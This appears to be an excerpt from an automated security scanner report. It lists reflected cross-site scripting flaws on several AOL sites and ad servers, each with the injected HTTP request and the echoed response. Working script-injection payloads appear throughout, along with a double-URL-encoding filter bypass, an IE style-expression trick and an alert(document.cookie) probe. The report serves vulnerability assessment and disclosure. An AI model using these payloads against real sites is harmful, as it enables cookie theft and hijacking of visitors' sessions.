<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="alternate" type= ...[SNIP]... <link rel="canonical" href="http://news.travel.aol.com/explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1" /> ...[SNIP]...
1.175. http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://news.travel.aol.com
Path: /hotel/inside-the-royalton-in-new-york-city/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82562"><script>alert(1)</script>fa0b25a6bcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1" /> ...[SNIP]...
1.176. http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://news.travel.aol.com
Path: /hotel/los-angeles-hotels-near-lax/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9529f"><script>alert(1)</script>db864afbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1" /> ...[SNIP]...
1.177. http://nfl.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nfl.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9200f"-alert(1)-"9027b25266b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9200f"-alert(1)-"9027b25266b=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fdd"><script>alert(1)</script>96eb04b239 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /superbowlf1fdd"><script>alert(1)</script>96eb04b239 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8568c"-alert(1)-"007a301d86a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /superbowl8568c"-alert(1)-"007a301d86a HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.180. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nfl.fanhouse.com
Path: /superbowl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2724f"><script>alert(1)</script>d81db27d9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1"/> ...[SNIP]...
1.181. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nfl.fanhouse.com
Path: /superbowl
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0873"-alert(1)-"cfe39284596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /superbowl?e0873"-alert(1)-"cfe39284596=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.182. http://nhl.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nhl.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0e"-alert(1)-"693917f6b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?79d0e"-alert(1)-"693917f6b35=1 HTTP/1.1
Host: nhl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe was submitted in the REST URL parameter 2. This input was echoed as 8256c</script><script>alert(1)</script>17094e0f3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/latino-news8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe/ HTTP/1.1
Host: noticias.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 93d1a<a>32b91cfbcdc was submitted in the c parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 14885<script>alert(1)</script>c21e4d75bd1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12659/989cc9ecbfd3d382e27b06d49f58dc6f?callback=BF_PARTNER.gate_response14885<script>alert(1)</script>c21e4d75bd1&cb=3913 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604794
Expires: Sun, 13 Feb 2011 20:54:34 GMT
Date: Sun, 06 Feb 2011 20:54:40 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6dc58<script>alert(1)</script>2112900b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsonmfus/ws?service=symslist,markets&symbols=E:DJI:$INDU,E:NAI:$COMPX,E:CMI:$INX,E:BSS:(TC10Y,E:ISE:UKX,E:FX1:N225,E:FX1:HSIX,E:FX1:EURUSD,E:FX1:USDJPY,E:DEI:DAX,E:FX1:GBPUSD,E:FX1:USDCHF,E:CMX:/GC\J11,E:NYM:/CL\H11,E:NYM:/PL\J11,E:NYM:/NG\J11,E:NYS:C,E:NYS:BAC,E:NYS:SPY,E:NYS:S,E:NYS:KV.A,E:NYS:KV.B,E:NYS:NPTN,E:NYS:EEE,E:NYS:CPX,E:NYS:DQ,E:NYS:GMXR,E:NYS:LVS&porttype=2&portmax=100&callback=rebuildLiveHash6dc58<script>alert(1)</script>2112900b8a8&rf=http://www.dailyfinance.com HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff was submitted in the REST URL parameter 4. This input was echoed as eaf12"style="x:expression(alert(1))"c3cb16c7ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog/2011/02/04eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff/million-dollar-home-defaults-just-what-the-doctor-ordered/ HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array (
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5777"a%3d"b"0794e1ec659 was submitted in the REST URL parameter 4. This input was echoed as f5777"a="b"0794e1ec659 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/2011/02/04f5777"a%3d"b"0794e1ec659/worst-foreclosed-home-vandalism-ever/ HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array (
The value of the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbd12"-alert(1)-"111d3ab201f was submitted in the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93306318;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=11328D1137525B"
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:32 GMT
Server: Jetty(6.1.22)
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 811
Via: 1.1 mdw061007 (MII-APC/1.6)
var ftGUID_97125="11328D1137525B"; var ftConfID_97125="0"; var ftParams_97125="click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e1 ...[SNIP]... 50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641"; var ftKeyword_97125=""; var ftSegment_97125="";
The value of the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 669f0"-alert(1)-"5792a5b5c84 was submitted in the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:16 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11326E86B479C3";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:16 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061005 (MII-APC/1.6)
var ftGUID_97126="11326E86B479C3"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92b2b"-alert(1)-"f12dac9a158 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:16 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11327B18B63DDD";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:16 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061006 (MII-APC/1.6)
var ftGUID_97126="11327B18B63DDD"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af2"-alert(1)-"04fe214699f was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:51 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=113270ECF2D3D1";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:51 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061004 (MII-APC/1.6)
var ftGUID_97126="113270ECF2D3D1"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... :50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 877e4"-alert(1)-"462c4afd1b1 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:04 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11323EB1B09D0E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:04 GMT
Cache-Control: no-cache, no-store
Content-Length: 758
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_97126="11323EB1B09D0E"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b507"-alert(1)-"1359c52bda6 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:25 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11327F503D579E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:25 GMT
Cache-Control: no-cache, no-store
Content-Length: 758
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
